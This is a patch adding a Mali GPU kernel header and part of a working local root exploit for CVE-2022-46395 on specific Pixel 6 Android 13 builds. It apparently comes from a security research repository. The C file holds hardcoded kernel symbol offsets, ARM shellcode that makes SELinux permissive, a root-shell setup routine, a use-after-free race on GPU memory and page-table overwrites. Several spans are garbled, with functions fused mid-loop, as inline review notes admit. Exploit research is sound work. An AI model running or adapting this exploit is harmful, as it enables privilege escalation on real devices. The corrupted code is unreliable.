+ * is set in the base_jd_core_req) the CPU address of a
+ * base_jd_fragment object.
+ * @udata: User data.
+ * @extres_list: List of external resources.
+ * @nr_extres: Number of external resources or JIT allocations.
+ * @jit_id: Zero-terminated array of IDs of just-in-time memory
+ * allocations written to by the atom. When the atom
+ * completes, the value stored at the
+ * &struct_base_jit_alloc_info.heap_info_gpu_addr of
+ * each allocation is read in order to enforce an
+ * overall physical memory usage limit.
+ * @pre_dep:      Pre-dependencies. One needs to use a SETTER function to assign
+ * this field; this is done in order to reduce possibility of
+ * improper assignment of a dependency field.
+ * @atom_number: Unique number to identify the atom.
+ * @prio: Atom priority. Refer to base_jd_prio for more details.
+ * @device_nr: Core group when BASE_JD_REQ_SPECIFIC_COHERENT_GROUP
+ * specified.
+ * @jobslot: Job slot to use when BASE_JD_REQ_JOB_SLOT is specified.
+ * @core_req: Core requirements.
+ * @renderpass_id: Renderpass identifier used to associate an atom that has
+ * BASE_JD_REQ_START_RENDERPASS set in its core requirements
+ * with an atom that has BASE_JD_REQ_END_RENDERPASS set.
+ * @padding: Unused. Must be zero.
+ */
+typedef struct base_jd_atom {
+ __u64 seq_nr;
+ __u64 jc;
+ struct base_jd_udata udata;
+ __u64 extres_list;
+ __u16 nr_extres;
+ __u8 jit_id[2];
+ struct base_dependency pre_dep[2];
+ base_atom_id atom_number;
+ base_jd_prio prio;
+ __u8 device_nr;
+ __u8 jobslot;
+ base_jd_core_req core_req;
+ __u8 renderpass_id;
+ __u8 padding[7];
+} base_jd_atom;
+
+struct base_jit_alloc_info {
+ __u64 gpu_alloc_addr;
+ __u64 va_pages;
+ __u64 commit_pages;
+ __u64 extension;
+ __u8 id;
+ __u8 bin_id;
+ __u8 max_allocations;
+ __u8 flags;
+ __u8 padding[2];
+ __u16 usage_id;
+ __u64 heap_info_gpu_addr;
+};
+
+struct base_external_resource {
+ __u64 ext_resource;
+};
+
+/* Job chain event code bits
+ * Defines the bits used to create ::base_jd_event_code
+ */
+enum {
+ BASE_JD_SW_EVENT_KERNEL = (1u << 15), /* Kernel side event */
+ BASE_JD_SW_EVENT = (1u << 14), /* SW defined event */
+ /* Event indicates success (SW events only) */
+ BASE_JD_SW_EVENT_SUCCESS = (1u << 13),
+ BASE_JD_SW_EVENT_JOB = (0u << 11), /* Job related event */
+ BASE_JD_SW_EVENT_BAG = (1u << 11), /* Bag related event */
+ BASE_JD_SW_EVENT_INFO = (2u << 11), /* Misc/info event */
+ BASE_JD_SW_EVENT_RESERVED = (3u << 11), /* Reserved event type */
+ /* Mask to extract the type from an event code */
+ BASE_JD_SW_EVENT_TYPE_MASK = (3u << 11)
+};
+
+/**
+ * enum base_jd_event_code - Job chain event codes
+ *
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_START: Start of hardware non-fault status
+ * codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault, because the
+ * job was hard-stopped.
+ * @BASE_JD_EVENT_NOT_STARTED: Can't be seen by userspace, treated as
+ * 'previous job done'.
+ * @BASE_JD_EVENT_STOPPED: Can't be seen by userspace, becomes
+ * TERMINATED, DONE or JOB_CANCELLED.
+ * @BASE_JD_EVENT_TERMINATED: This is actually a fault status code - the job
+ * was hard stopped.
+ * @BASE_JD_EVENT_ACTIVE: Can't be seen by userspace, jobs only returned on
+ * complete/fail/cancel.
+ * @BASE_JD_EVENT_RANGE_HW_NONFAULT_END: End of hardware non-fault status codes.
+ * Obscurely, BASE_JD_EVENT_TERMINATED
+ * indicates a real fault,
+ * because the job was hard-stopped.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START: Start of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END: End of hardware fault and
+ * software error status codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_START: Start of software success status
+ * codes.
+ * @BASE_JD_EVENT_RANGE_SW_SUCCESS_END: End of software success status codes.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_START: Start of kernel-only status codes.
+ * Such codes are never returned to
+ * user-space.
+ * @BASE_JD_EVENT_RANGE_KERNEL_ONLY_END: End of kernel-only status codes.
+ * @BASE_JD_EVENT_DONE: atom has completed successfully
+ * @BASE_JD_EVENT_JOB_CONFIG_FAULT: Atom dependencies configuration error which
+ * shall result in a failed atom
+ * @BASE_JD_EVENT_JOB_POWER_FAULT: The job could not be executed because the
+ * part of the memory system required to access
+ * job descriptors was not powered on
+ * @BASE_JD_EVENT_JOB_READ_FAULT: Reading a job descriptor into the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_WRITE_FAULT: Writing a job descriptor from the Job
+ * manager failed
+ * @BASE_JD_EVENT_JOB_AFFINITY_FAULT: The job could not be executed because the
+ * specified affinity mask does not intersect
+ * any available cores
+ * @BASE_JD_EVENT_JOB_BUS_FAULT: A bus access failed while executing a job
+ * @BASE_JD_EVENT_INSTR_INVALID_PC: A shader instruction with an illegal program
+ * counter was executed.
+ * @BASE_JD_EVENT_INSTR_INVALID_ENC: A shader instruction with an illegal
+ * encoding was executed.
+ * @BASE_JD_EVENT_INSTR_TYPE_MISMATCH: A shader instruction was executed where
+ * the instruction encoding did not match the
+ * instruction type encoded in the program
+ * counter.
+ * @BASE_JD_EVENT_INSTR_OPERAND_FAULT: A shader instruction was executed that
+ * contained invalid combinations of operands.
+ * @BASE_JD_EVENT_INSTR_TLS_FAULT: A shader instruction was executed that tried
+ * to access the thread local storage section
+ * of another thread.
+ * @BASE_JD_EVENT_INSTR_ALIGN_FAULT: A shader instruction was executed that
+ * tried to do an unsupported unaligned memory
+ * access.
+ * @BASE_JD_EVENT_INSTR_BARRIER_FAULT: A shader instruction was executed that
+ * failed to complete an instruction barrier.
+ * @BASE_JD_EVENT_DATA_INVALID_FAULT: Any data structure read as part of the job
+ * contains invalid combinations of data.
+ * @BASE_JD_EVENT_TILE_RANGE_FAULT: Tile or fragment shading was asked to
+ * process a tile that is entirely outside the
+ * bounding box of the frame.
+ * @BASE_JD_EVENT_STATE_FAULT: Matches ADDR_RANGE_FAULT. A virtual address
+ * has been found that exceeds the virtual
+ * address range.
+ * @BASE_JD_EVENT_OUT_OF_MEMORY: The tiler ran out of memory when executing a job.
+ * @BASE_JD_EVENT_UNKNOWN: If multiple jobs in a job chain fail, only
+ *                                     the first one that reports an error will set
+ * and return full error information.
+ * Subsequent failing jobs will not update the
+ * error status registers, and may write an
+ * error status of UNKNOWN.
+ * @BASE_JD_EVENT_DELAYED_BUS_FAULT: The GPU received a bus fault for access to
+ * physical memory where the original virtual
+ * address is no longer available.
+ * @BASE_JD_EVENT_SHAREABILITY_FAULT: Matches GPU_SHAREABILITY_FAULT. A cache
+ * has detected that the same line has been
+ * accessed as both shareable and non-shareable
+ * memory from inside the GPU.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1: A memory access hit an invalid table
+ * entry at level 1 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2: A memory access hit an invalid table
+ * entry at level 2 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3: A memory access hit an invalid table
+ * entry at level 3 of the translation table.
+ * @BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4: A memory access hit an invalid table
+ * entry at level 4 of the translation table.
+ * @BASE_JD_EVENT_PERMISSION_FAULT: A memory access could not be allowed due to
+ * the permission flags set in translation
+ * table
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1: A bus fault occurred while reading
+ * level 0 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2: A bus fault occurred while reading
+ * level 1 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3: A bus fault occurred while reading
+ * level 2 of the translation tables.
+ * @BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4: A bus fault occurred while reading
+ * level 3 of the translation tables.
+ * @BASE_JD_EVENT_ACCESS_FLAG: Matches ACCESS_FLAG_0. A memory access hit a
+ * translation table entry with the ACCESS_FLAG
+ * bit set to zero in level 0 of the
+ * page table, and the DISABLE_AF_FAULT flag
+ * was not set.
+ * @BASE_JD_EVENT_MEM_GROWTH_FAILED: raised for JIT_ALLOC atoms that failed to
+ * grow memory on demand
+ * @BASE_JD_EVENT_JOB_CANCELLED: raised when this atom was hard-stopped or its
+ * dependencies failed
+ * @BASE_JD_EVENT_JOB_INVALID: raised for many reasons, including invalid data
+ * in the atom which overlaps with
+ * BASE_JD_EVENT_JOB_CONFIG_FAULT, or if the
+ * platform doesn't support the feature specified in
+ * the atom.
+ * @BASE_JD_EVENT_PM_EVENT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_TIMED_OUT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_INVALID: TODO: remove as it's not used
+ * @BASE_JD_EVENT_PROGRESS_REPORT: TODO: remove as it's not used
+ * @BASE_JD_EVENT_BAG_DONE: TODO: remove as it's not used
+ * @BASE_JD_EVENT_DRV_TERMINATED: this is a special event generated to indicate
+ * to userspace that the KBase context has been
+ * destroyed and Base should stop listening for
+ * further events
+ * @BASE_JD_EVENT_REMOVED_FROM_NEXT: raised when an atom that was configured in
+ * the GPU has to be retried (but it has not
+ * started) due to e.g., GPU reset
+ * @BASE_JD_EVENT_END_RP_DONE: this is used for incremental rendering to signal
+ * the completion of a renderpass. This value
+ * shouldn't be returned to userspace but I haven't
+ * seen where it is reset back to JD_EVENT_DONE.
+ *
+ * HW and low-level SW events are represented by event codes.
+ * The status of jobs which succeeded are also represented by
+ * an event code (see @BASE_JD_EVENT_DONE).
+ * Events are usually reported as part of a &struct base_jd_event.
+ *
+ * The event codes are encoded in the following way:
+ * * 10:0 - subtype
+ * * 12:11 - type
+ * * 13 - SW success (only valid if the SW bit is set)
+ * * 14 - SW event (HW event if not set)
+ * * 15 - Kernel event (should never be seen in userspace)
+ *
+ * Events are split up into ranges as follows:
+ * * BASE_JD_EVENT_RANGE_<description>_START
+ * * BASE_JD_EVENT_RANGE_<description>_END
+ *
+ * code is in <description>'s range when:
+ * BASE_JD_EVENT_RANGE_<description>_START <= code <
+ * BASE_JD_EVENT_RANGE_<description>_END
+ *
+ * Ranges can be asserted for adjacency by testing that the END of the previous
+ * is equal to the START of the next. This is useful for optimizing some tests
+ * for range.
+ *
+ * A limitation is that the last member of this enum must explicitly be handled
+ * (with an assert-unreachable statement) in switch statements that use
+ * variables of this type. Otherwise, the compiler warns that we have not
+ * handled that enum value.
+ */
+enum base_jd_event_code {
+ /* HW defined exceptions */
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_START = 0,
+
+ /* non-fatal exceptions */
+ BASE_JD_EVENT_NOT_STARTED = 0x00,
+ BASE_JD_EVENT_DONE = 0x01,
+ BASE_JD_EVENT_STOPPED = 0x03,
+ BASE_JD_EVENT_TERMINATED = 0x04,
+ BASE_JD_EVENT_ACTIVE = 0x08,
+
+ BASE_JD_EVENT_RANGE_HW_NONFAULT_END = 0x40,
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_START = 0x40,
+
+ /* job exceptions */
+ BASE_JD_EVENT_JOB_CONFIG_FAULT = 0x40,
+ BASE_JD_EVENT_JOB_POWER_FAULT = 0x41,
+ BASE_JD_EVENT_JOB_READ_FAULT = 0x42,
+ BASE_JD_EVENT_JOB_WRITE_FAULT = 0x43,
+ BASE_JD_EVENT_JOB_AFFINITY_FAULT = 0x44,
+ BASE_JD_EVENT_JOB_BUS_FAULT = 0x48,
+ BASE_JD_EVENT_INSTR_INVALID_PC = 0x50,
+ BASE_JD_EVENT_INSTR_INVALID_ENC = 0x51,
+ BASE_JD_EVENT_INSTR_TYPE_MISMATCH = 0x52,
+ BASE_JD_EVENT_INSTR_OPERAND_FAULT = 0x53,
+ BASE_JD_EVENT_INSTR_TLS_FAULT = 0x54,
+ BASE_JD_EVENT_INSTR_BARRIER_FAULT = 0x55,
+ BASE_JD_EVENT_INSTR_ALIGN_FAULT = 0x56,
+ BASE_JD_EVENT_DATA_INVALID_FAULT = 0x58,
+ BASE_JD_EVENT_TILE_RANGE_FAULT = 0x59,
+ BASE_JD_EVENT_STATE_FAULT = 0x5A,
+ BASE_JD_EVENT_OUT_OF_MEMORY = 0x60,
+ BASE_JD_EVENT_UNKNOWN = 0x7F,
+
+ /* GPU exceptions */
+ BASE_JD_EVENT_DELAYED_BUS_FAULT = 0x80,
+ BASE_JD_EVENT_SHAREABILITY_FAULT = 0x88,
+
+ /* MMU exceptions */
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL1 = 0xC1,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL2 = 0xC2,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL3 = 0xC3,
+ BASE_JD_EVENT_TRANSLATION_FAULT_LEVEL4 = 0xC4,
+ BASE_JD_EVENT_PERMISSION_FAULT = 0xC8,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL1 = 0xD1,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL2 = 0xD2,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL3 = 0xD3,
+ BASE_JD_EVENT_TRANSTAB_BUS_FAULT_LEVEL4 = 0xD4,
+ BASE_JD_EVENT_ACCESS_FLAG = 0xD8,
+
+ /* SW defined exceptions */
+ BASE_JD_EVENT_MEM_GROWTH_FAILED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_TIMED_OUT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x001,
+ BASE_JD_EVENT_JOB_CANCELLED =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x002,
+ BASE_JD_EVENT_JOB_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x003,
+ BASE_JD_EVENT_PM_EVENT =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_JOB | 0x004,
+
+ BASE_JD_EVENT_BAG_INVALID =
+ BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_BAG | 0x003,
+
+ BASE_JD_EVENT_RANGE_HW_FAULT_OR_SW_ERROR_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | 0x000,
+
+ BASE_JD_EVENT_PROGRESS_REPORT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_BAG_DONE = BASE_JD_SW_EVENT | BASE_JD_SW_EVENT_SUCCESS |
+ BASE_JD_SW_EVENT_BAG | 0x000,
+ BASE_JD_EVENT_DRV_TERMINATED = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_INFO | 0x000,
+
+ BASE_JD_EVENT_RANGE_SW_SUCCESS_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_SUCCESS | BASE_JD_SW_EVENT_RESERVED | 0x3FF,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_START = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | 0x000,
+ BASE_JD_EVENT_REMOVED_FROM_NEXT = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x000,
+ BASE_JD_EVENT_END_RP_DONE = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_JOB | 0x001,
+
+ BASE_JD_EVENT_RANGE_KERNEL_ONLY_END = BASE_JD_SW_EVENT |
+ BASE_JD_SW_EVENT_KERNEL | BASE_JD_SW_EVENT_RESERVED | 0x3FF
+};
+
+/**
+ * struct base_jd_event_v2 - Event reporting structure
+ *
+ * @event_code: event code.
+ * @atom_number: the atom number that has completed.
+ * @udata: user data.
+ *
+ * This structure is used by the kernel driver to report information
+ * about GPU events. They can either be HW-specific events or low-level
+ * SW events, such as job-chain completion.
+ *
+ * The event code contains an event type field which can be extracted
+ * by ANDing with BASE_JD_SW_EVENT_TYPE_MASK.
+ */
+struct base_jd_event_v2 {
+ enum base_jd_event_code event_code;
+ base_atom_id atom_number;
+ struct base_jd_udata udata;
+};
+
+/**
+ * struct base_dump_cpu_gpu_counters - Structure for
+ * BASE_JD_REQ_SOFT_DUMP_CPU_GPU_COUNTERS
+ * jobs.
+ * @system_time: gpu timestamp
+ * @cycle_counter: gpu cycle count
+ * @sec: cpu time(sec)
+ * @usec: cpu time(usec)
+ * @padding: padding
+ *
+ * This structure is stored into the memory pointed to by the @jc field
+ * of &struct base_jd_atom.
+ *
+ * It must not occupy the same CPU cache line(s) as any neighboring data.
+ * This is to avoid cases where access to pages containing the structure
+ * is shared between cached and un-cached memory regions, which would
+ * cause memory corruption.
+ */
+
+struct base_dump_cpu_gpu_counters {
+ __u64 system_time;
+ __u64 cycle_counter;
+ __u64 sec;
+ __u32 usec;
+ __u8 padding[36];
+};
+
+#endif /* _UAPI_BASE_JM_KERNEL_H_ */
+
diff --git a/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
new file mode 100644
index 0000000..624de53
--- /dev/null
+++ b/SecurityExploits/Android/Mali/CVE_2022_46395/mali_user_buf.c
@@ -0,0 +1,670 @@
+#define _GNU_SOURCE
+
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include "stdbool.h"
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+#include
+
+#include "mali.h"
+#include "mali_base_jm_kernel.h"
+#include "mempool_utils.h"
+#include "mem_write.h"
+
+#define MALI "/dev/mali0"
+
+#define PAGE_SHIFT 12
+
+#define BASE_MEM_ALIAS_MAX_ENTS ((size_t)24576)
+
+#define RESERVED_SIZE 32
+
+#define TOTAL_RESERVED_SIZE 1024
+
+#define PFN_DOWN(x) ((x) >> PAGE_SHIFT)
+
+#define UNMAP_CPU 1
+
+#define UPDATE_CPU 0
+
+#define WAIT_CPU 2
+
+#define NB_PREEMPT_THREAD 32
+
+#define NR_WATCHES 100 //5000
+#define NR_EPFDS 500
+
+#define TEST_ENT 3
+
+#define NSEC_PER_SEC 1000000000UL
+
+#define DEFAULT_WAIT 505
+
+#define CORRUPTED_VA_SIZE 500
+
+#define CORRUPTED_COMMIT_SIZE 10
+
+#define AVC_DENY_2211 0x8d6810
+
+#define SEL_READ_ENFORCE_2211 0x8ea124
+
+#define INIT_CRED_2211 0x2fd1388
+
+#define COMMIT_CREDS_2211 0x17ada4
+
+#define ADD_INIT_2211 0x910e2000 //add x0, x0, #0x388
+
+#define ADD_COMMIT_2211 0x91369108 //add x8, x8, #0xda4
+
+#define AVC_DENY_2212 0x8ba710
+
+#define SEL_READ_ENFORCE_2212 0x8cdfd4
+
+#define INIT_CRED_2212 0x2fd1418
+
+#define COMMIT_CREDS_2212 0x177ee4
+
+#define ADD_INIT_2212 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2212 0x913b9108 //add x8, x8, #0xee4
+
+#define AVC_DENY_2301 0x8ba710
+
+#define SEL_READ_ENFORCE_2301 0x8cdfd4
+
+#define INIT_CRED_2301 0x2fd1418
+
+#define COMMIT_CREDS_2301 0x177ee4
+
+#define ADD_INIT_2301 0x91106000 //add x0, x0, #0x418
+
+#define ADD_COMMIT_2301 0x913b9108 //add x8, x8, #0xee4
+
+static uint64_t sel_read_enforce = SEL_READ_ENFORCE_2211;
+
+static uint64_t avc_deny = AVC_DENY_2211;
+
+static uint32_t permissive[3] = {0x3900001f, 0xd2800000,0xd65f03c0};
+
+static uint32_t root_code[8] = {0};
+
+static uint64_t uevent;
+static uint8_t atom_number = 0;
+static volatile int g_ready_unmap = 0;
+static struct timespec unmap_time;
+static struct timespec finished_fault_time;
+static uint8_t g_initial_read = TEST_ENT;
+static int need_reset_fd = 0;
+static volatile bool success = false;
+static int error_code = 0;
+static struct timespec finished_reset_time;
+static uint64_t reserved[TOTAL_RESERVED_SIZE/RESERVED_SIZE];
+static uint64_t corrupted_region = 0;
+static uint64_t benchmark_time = DEFAULT_WAIT;
+static uint64_t this_benchmark_time = 0;
+
+#define OFF 4
+
+// Wrap a syscall-style expression: evaluate it exactly once, abort via
+// err(1, ...) (which appends strerror(errno)) if it returned -1, otherwise
+// yield the result. Uses a GCC/Clang statement expression and typeof, so the
+// wrapper works for any return type that can represent -1.
+#define SYSCHK(x) ({ \
+ typeof(x) __res = (x); \
+ if (__res == (typeof(x))-1) \
+ err(1, "SYSCHK(" #x ")"); \
+ __res; \
+})
+
+
+void select_offset() {
+ char fingerprint[256];
+ int len = __system_property_get("ro.build.fingerprint", fingerprint);
+ LOG("fingerprint: %s\n", fingerprint);
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TP1A.221105.002/9080065:user/release-keys")) {
+ avc_deny = AVC_DENY_2211;
+ sel_read_enforce = SEL_READ_ENFORCE_2211;
+ fixup_root_shell(INIT_CRED_2211, COMMIT_CREDS_2211, SEL_READ_ENFORCE_2211, ADD_INIT_2211, ADD_COMMIT_2211, &(root_code[0]));
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.221205.011/9244662:user/release-keys")) {
+ avc_deny = AVC_DENY_2212;
+ sel_read_enforce = SEL_READ_ENFORCE_2212;
+ fixup_root_shell(INIT_CRED_2212, COMMIT_CREDS_2212, SEL_READ_ENFORCE_2212, ADD_INIT_2212, ADD_COMMIT_2212, &(root_code[0]));
+ return;
+ }
+ if (!strcmp(fingerprint, "google/oriole/oriole:13/TQ1A.230105.002/9325679:user/release-keys")) {
+ avc_deny = AVC_DENY_2301;
+ sel_read_enforce = SEL_READ_ENFORCE_2301;
+ fixup_root_shell(INIT_CRED_2301, COMMIT_CREDS_2301, SEL_READ_ENFORCE_2301, ADD_INIT_2301, ADD_COMMIT_2301, &(root_code[0]));
+ return;
+ }
+
+ err(1, "unable to match build id\n");
+}
+
/* Thin wrapper over the raw io_setup(2) syscall (no libaio dependency). */
static int io_setup(unsigned nr, aio_context_t *ctxp)
{
  long rc = syscall(__NR_io_setup, nr, ctxp);
  return (int)rc;
}
+
/* Thin wrapper over the raw io_destroy(2) syscall. */
static int io_destroy(aio_context_t ctx)
{
  long rc = syscall(__NR_io_destroy, ctx);
  return (int)rc;
}
+
/* Register fd with epfd for EPOLLIN; aborts on failure via SYSCHK. */
void epoll_add(int epfd, int fd) {
  struct epoll_event interest = {0};
  interest.events = EPOLLIN;
  SYSCHK(epoll_ctl(epfd, EPOLL_CTL_ADD, fd, &interest));
}
+
+struct timespec get_mono_time(void) {
+ struct timespec ts;
+ SYSCHK(clock_gettime(CLOCK_MONOTONIC, &ts));
+ return ts;
+}
+
#ifndef NSEC_PER_SEC
#define NSEC_PER_SEC 1000000000UL
#endif

/*
 * Convert a timespec to a single nanosecond count.
 *
 * Fix: the original was declared plain `inline`; in C99/C11 that provides
 * only an inline definition with no external linkage, so a non-inlined call
 * (e.g. at -O0) produces an undefined reference. `static inline` gives the
 * function internal linkage and is always safe in a .c file.
 */
static inline unsigned long timespec_to_ns(struct timespec ts) {
  return (unsigned long)ts.tv_sec * NSEC_PER_SEC + (unsigned long)ts.tv_nsec;
}
+
#ifndef NSEC_PER_SEC
#define NSEC_PER_SEC 1000000000UL
#endif

/*
 * Subtract nsecs nanoseconds from *ts, keeping tv_nsec normalized to
 * [0, NSEC_PER_SEC).
 *
 * Fix: the original only borrowed a single second, so any nsecs >=
 * NSEC_PER_SEC left tv_nsec negative/out of range. Split the argument into
 * whole seconds and a sub-second remainder first; behavior for
 * nsecs < NSEC_PER_SEC is unchanged.
 */
void ts_sub(struct timespec *ts, unsigned long nsecs) {
  ts->tv_sec -= (long)(nsecs / NSEC_PER_SEC);
  nsecs %= NSEC_PER_SEC;
  if ((unsigned long)ts->tv_nsec < nsecs) {
    ts->tv_sec--;
    ts->tv_nsec += NSEC_PER_SEC;
  }
  ts->tv_nsec -= nsecs;
}
#ifndef NSEC_PER_SEC
#define NSEC_PER_SEC 1000000000UL
#endif

/*
 * Add nsecs nanoseconds to *ts, keeping tv_nsec normalized to
 * [0, NSEC_PER_SEC).
 *
 * Fix: the original carried at most one second, so nsecs >= NSEC_PER_SEC
 * could leave tv_nsec out of range. Fold whole seconds in first; behavior
 * for nsecs < NSEC_PER_SEC is unchanged.
 */
void ts_add(struct timespec *ts, unsigned long nsecs) {
  ts->tv_sec += (long)(nsecs / NSEC_PER_SEC);
  ts->tv_nsec += (long)(nsecs % NSEC_PER_SEC);
  if (ts->tv_nsec >= (long)NSEC_PER_SEC) {
    ts->tv_sec++;
    ts->tv_nsec -= NSEC_PER_SEC;
  }
}
+bool ts_is_in_future(struct timespec ts) {
+ struct timespec cur = get_mono_time();
+ if (ts.tv_sec > cur.tv_sec)
+ return true;
+ if (ts.tv_sec < cur.tv_sec)
+ return false;
+ return ts.tv_nsec > cur.tv_nsec;
+}
+
+// NOTE(review): this span of the patch appears corrupted — text containing
+// '<' seems to have been stripped by an HTML-style sanitizer. The body of
+// setup_timerfd() (the loop duplicating tfd into tfd_dups[NR_WATCHES], and
+// presumably epoll registration) and the signature of a two-argument
+// before(t1, t2) timespec-comparison helper have been fused at the
+// "for (int i=0; i" line below. Restore these from the upstream
+// SecurityLab repository rather than hand-reconstructing them.
+void setup_timerfd() {
+ int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+ int tfd_dups[NR_WATCHES];
+ for (int i=0; itv_sec < t2->tv_sec) return true;
+ if (t1->tv_sec > t2->tv_sec) return false;
+ return t1->tv_nsec < t2->tv_nsec;
+}
+
+bool before_reset() {
+ return finished_reset_time.tv_sec == 0 || before(&finished_fault_time, &finished_reset_time);
+}
+
+// Racing thread: pinned to UNMAP_CPU, it spins until the agreed-upon
+// unmap_time, touches the imported mapping to record its pre-race contents,
+// then frees the GPU region and immediately unmaps the external resource and
+// re-allocates a region over the just-freed pages (corrupted_region).
+// NOTE(review): the exact statement order here is timing-critical (it races
+// softjob_reset on another CPU); do not reorder.
+void* unmap_resources(void* args) {
+ uint64_t* arguments = (uint64_t*)args;
+ int mali_fd = (int)(arguments[0]);
+
+ migrate_to_cpu(UNMAP_CPU);
+ struct kbase_ioctl_mem_free mem_free = {.gpu_addr = (64ul << 12) + 0x1000};
+
+ // Busy-wait for the main thread's go signal, then for the scheduled time.
+ while (!g_ready_unmap);
+ while (ts_is_in_future(unmap_time));
+ migrate_to_cpu(UNMAP_CPU);
+ // Sample the sentinel byte; bail out if the mapping no longer holds it.
+ g_initial_read = *(volatile uint8_t*)(uevent + OFF);
+ if (g_initial_read != TEST_ENT) return NULL;
+ ioctl(mali_fd, KBASE_IOCTL_MEM_FREE, &mem_free);
+ finished_fault_time = get_mono_time();
+ if (!before_reset()) return NULL;
+// LOG("finished reset time %ld %ld fault time %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, finished_fault_time.tv_sec, finished_fault_time.tv_nsec);
+ unmap_external_resource(mali_fd, uevent);
+ // Reclaim the freed backing pages with a fresh GPU allocation.
+ corrupted_region = (uint64_t)map_gpu(mali_fd, CORRUPTED_VA_SIZE, CORRUPTED_COMMIT_SIZE, false, 1);
+
+// struct timespec time_now = get_mono_time();
+// LOG("finished reset time: %ld %ld, finished map time: %ld %ld\n", finished_reset_time.tv_sec, finished_reset_time.tv_nsec, time_now.tv_sec, time_now.tv_nsec);
+ return NULL;
+}
+
+void check_success() {
+ if (error_code != 0 || g_initial_read != TEST_ENT) return;
+ if (finished_fault_time.tv_sec == 0) return;
+ if (finished_reset_time.tv_sec < finished_fault_time.tv_sec) return;
+ if (finished_reset_time.tv_sec > finished_fault_time.tv_sec) {
+ success = 1;
+ return;
+ }
+ if (finished_reset_time.tv_sec == finished_fault_time.tv_sec) {
+ if (finished_reset_time.tv_nsec > finished_fault_time.tv_nsec) {
+ success = 1;
+ return;
+ }
+ }
+ return;
+}
+
+// NOTE(review): this span of the patch appears corrupted — sanitization has
+// removed text at the "for (int i=0; i" line below, fusing the remainder of
+// softjob_reset() (its timerfd/epoll setup, timing benchmark and the
+// KBASE_IOCTL_SOFT_EVENT_UPDATE call) with the middle of a separate
+// write_shellcode(mali_fd, mali_fd2, pgd, reserved) function whose opening
+// (including the avc_deny_addr computation) is missing. Restore both from
+// the upstream SecurityLab repository; only the write_shellcode tail from
+// the first write_to() call onward is intact.
+void* softjob_reset(void* arg) {
+ uint64_t* arguments = (uint64_t*)arg;
+ uint64_t benchmark = arguments[1];
+ struct timespec start_benchmark_time;
+ struct kbase_ioctl_soft_event_update update= {0};
+ update.event = benchmark ? 0 : uevent + OFF;
+ update.new_status = 0;
+
+ int tfd = SYSCHK(timerfd_create(CLOCK_MONOTONIC, 0));
+ int tfd_dups[NR_WATCHES];
+ for (int i=0; i> PAGE_SHIFT) << PAGE_SHIFT)| 0x443;
+ write_to(mali_fd, pgd + OVERWRITE_INDEX * sizeof(uint64_t), avc_deny_addr, atom_number++, MALI_WRITE_VALUE_TYPE_IMMEDIATE_64);
+
+ usleep(100000);
+ //Go through the reserve pages addresses to write to avc_denied with our own shellcode
